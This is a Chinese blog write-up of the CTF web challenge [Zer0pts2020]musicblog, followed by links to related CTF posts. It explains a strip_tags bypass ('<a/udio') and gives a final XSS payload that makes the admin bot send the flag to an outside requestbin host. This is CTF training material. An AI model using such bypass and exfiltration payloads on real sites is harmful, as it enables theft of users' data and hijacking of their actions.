每日一题 [Zer0pts2020]musicblog

最新推荐文章于 2022-12-20 21:22:05 发布
最新推荐文章于 2022-12-20 21:22:05 发布
阅读量625 收藏 1
点赞数
分类专栏: 每日一题 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/121151519
版权

进去一个登陆注册,先随便注册一个,然后进入以下页面
在这里插入图片描述
New post,看到他说都会replace radio,例如我们在我们服务器传一个MP3文件,那么Content内填[[url/xxx.mp3]]就可以播放了,但是这里有csp限制,只能在同一个域内请求,可以去看他给的例子,把例子的复制下来放进[[]]里面就可以播放,但是没卵用,看到下面有个if you check this check box,admin will check your post感觉就是xss了,F12观察一下是<audio>标签,插过自动播放,插过很多,疯狂的插,没用,搞了半天是给源码的…
在这里插入图片描述
既然给了源码,就看关键部分

// [[URL]] → <audio src="URL"></audio>
function render_tags($str) {
  $str = preg_replace('/[[(.+?)]]/', '<audio controls src="\1"></audio>', $str);
  $str = strip_tags($str, '<audio>'); // only allows `<audio>`
  return $str;
}

咱就是说,无语了。这里看了一下strip_tags,虽然注释说的是only allows <audio>,但是这里我们放个斜杠/他会变成空格,比如<a/udio>他就变成了<a udio>那么就想到用a href造成xss,关键是看管理员怎么访问,源码里给了id=like也就是点赞的这么一个动作,那么让管理员点赞一下我们发的东西应该就可以接受到他的请求,这里要用到BUU提供的内网服务,因为靶机不能访问外网

http://http.requestbin.buuoj.cn/

create一个,然后就懂的都懂
最终payload
<a/udio id=like href=http://http.requestbin.buuoj.cn/yhdw7ryh>
然后可以看到在UA头给了flag
在这里插入图片描述

总结

xss,一开始不知道给源码,很难受,所以我们需要细心观察)

Sapphire037
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
BUUCTF Reverse/[Zer0pts2020]easy strcmp
ookami6497的博客
08-12 475
BUUCTF Reverse/[Zer0pts2020]easy strcmp 先看文件信息,ELF文件,没有加壳 拖入IDA64位打开 应该没这么简单就给出flag __int64 __fastcall main(int a1, char **a2, char **a3) { if ( a1 > 1 ) { if ( !strcmp(a2[1], "zer0pts{********CENSORED********}") ) puts("Correct!"
CTF_2021_zer0pts
03-08
质询目录结构 / ├── category (The name doesn't matter) │   ├── challenge (The name doesn't matter) │   │   ├── challenge (Place the files required to build the task, which are not distributed to the competitors) │   │   │   ├── ... │   │   │ │   │   ├── distfiles (The files in this directory are packed in tar.gz and it's distributed) │   │   │   └── ... │   │   │ │   │   ├── rawdistfiles (The files in t
BUUCTF--[Zer0pts2020]easy strcmp
Hk_Mayfly的博客
06-17 1324
测试文件:https://wwa.lanzous.com/i54G4drrp1i 代码分析 打开IDA看了下main函数 这里就是将a2[1]与zer0pts{********CENSORED********}比较,a2[1]是我们的输入。 找到对输入字符串变换处 这里就是将输入分为8个一组,与qword_5605DCE75060数组元素,对应相减,得到zer0pts{***...
zer0pts CTF 2022 && VishwaCTF 2022
mumuzi的博客
03-21 6751
文章目录[zer0pts CTF 2022]MathHash [zer0pts CTF 2022]MathHash import struct import math import signal import os def MathHash(m): hashval = 0 for i in range(len(m)-7): c = struct.unpack('<Q', m[i:i+8])[0] t = math.tan(c * math.pi / (
[Zer0pts2020]easy strcmp 分析与加法
Tokameine的博客
06-23 1419
无壳,放入IDA自动跳到main函数 __int64 __fastcall main(int a1, char **a2, char **a3) { if ( a1 > 1 ) { if ( !strcmp(a2[1], "zer0pts{********CENSORED********}") ) puts("Correct!"); else puts("Wrong!"); } else { printf("Usage: ...
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts CTF 2021 是一个网络安全竞赛,主要针对网络安全爱好者和专业人士,旨在提升参赛者在信息安全领域的技能和知识。此类竞赛通常包括多种挑战,如逆向工程、密码学、网络取证、Web安全等。在这个特定的案例中,...
zer0m0n:用于布谷鸟沙箱的 zer0m0n 驱动程序
06-05
zer0m0n v0.8 zer0m0n 是 Cuckoo Sandbox 的驱动程序,它将在恶意软件执行期间进行内核分析。 恶意软件作者有很多方法可以绕过 Cuckoo 检测,他可以检测钩子,硬编码 Nt* 函数来避免钩子,检测虚拟机......这个驱动...
host0:Zer0net的托管服务
04-28
Peer0整合 在设置本地主机Web代理 回应来自同伴的基本要求 getFile PEX-对等交换 将完整的Zite下载并验证到本地存储 向跟踪器宣布资源可用性 零网络 HTTP UDP协议 使用Electron UI构建基本的管理仪表板 ...
zer0dump:滥用CVE-2020-1472(Zerologon)接管域,然后修复本地存储的计算机帐户密码
03-20
本文将深入探讨zer0dump,这是一个利用CVE-2020-1472(Zerologon)漏洞的Proof-of-Concept(PoC)攻击工具,该漏洞允许攻击者完全控制未修补的Windows域控制器。我们将讨论Zerologon漏洞的原理、zer0dump的工作方式...
[Zer0pts2020]easy strcmp
m0_55086916的博客
12-20 545
[Zer0pts2020]easy strcmp
BUU逆向 [Zer0pts2020]easy strcmp wp
苗_的博客
08-08 1159
拖进ida查看main函数,就是一个简单比较: 然后我们就看它对输入的字符进行了什么操作: 右移3位相当于除8,也就是把字符串分为8个一组,对应和qword_201060的值做减法,可以得到主函数里显示的字符串 注意:内存中存储为小端存储 我们只需要写出它的逆过程就可以了: #-*- coding:utf-8 -*- enc = "********CENSORED********" m = [0x410A4335494A0942, 0x0B0EF2F50BE619F0, 0x4F0A3A0
[Zer0pts2020]easy strcmp细节探究
a5555678744的博客
03-22 624
这道大多数的wp不知道这个程序是怎么跑的。 这道是由一个知名的日本战队zer0pts出的,还是挺新颖,挺有意思的 总体感知 首先来看看ida里的情景 这就是main函数的所有了,很简单,感觉啥也没有,输入那串用于比较的字符当然是没用的。 那就看看a1是不是在之前有加密,调交叉引用到start函数 但是从这里找也没找到加密,所以,此暗藏玄机呀。 函数挺少的,注意看下来不难发现下面这个函数绝对是加密函数 很多wp做到这里就结束了,但这不够! 实现细节分析 交叉引用说明.
[Zer0pts2020]Can you guess it?
Yb_140的博客
11-05 330
代码审计+正则绕过
[Zer0pts2020]Can you guess it.md
wuyaowangchuan的博客
01-27 301
目直接就给了源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { //$_SERVER['PHP_SELF']返回的是当前正在执行的脚本的名字'PHP_SELF'当前执行脚本的文件名,与 document root 有关。例如,在地址为 http://example.com/foo/bar..
basename函数漏洞之[Zer0pts2020]Can you guess it?
qq_58970968的博客
08-26 373
这里正则的绕过,不能让config.php结尾,在它后面加点东西就可以了,比如/a 等等,但是为了使后面的basename得到的结果为config.php,这后面加的东西不能乱加,那么就加非ASCII码的字符就行啦,给个脚本吧。basename 函数,获取路径中的文件名;比如:test/inde.php/s 就会返回index,php。但是漏洞就是,它会去掉文件名开头的或者结尾的非ASCII值!...
Zer0pts CTF 2020的web赛后记录+复现环境
蚁景网安学院
05-28 1666
May 2020Zer0pts CTF 2020的web赛后记录前言打了Zer0pts CTF 2020感觉目不错就总结一下。复现环境地址:https://gitlab.com/z...
buu-[Zer0pts2020]Can you guess it?
qaq517384的博客
10-07 211
有源码直接看源码了 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)"); } if (isset($_GET['source'])) { highl
ZeroDivisionError: division by zer
最新发布
05-19
这个错误通常是因为代码中尝试将一个数除以0导致的。例如: ```python x = 10 y = 0 z = x/y # 会抛出 ZeroDivisionError ``` 解决这个错误的方法是确保除数不为0,或者在代码中使用异常处理来处理这种情况。例如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值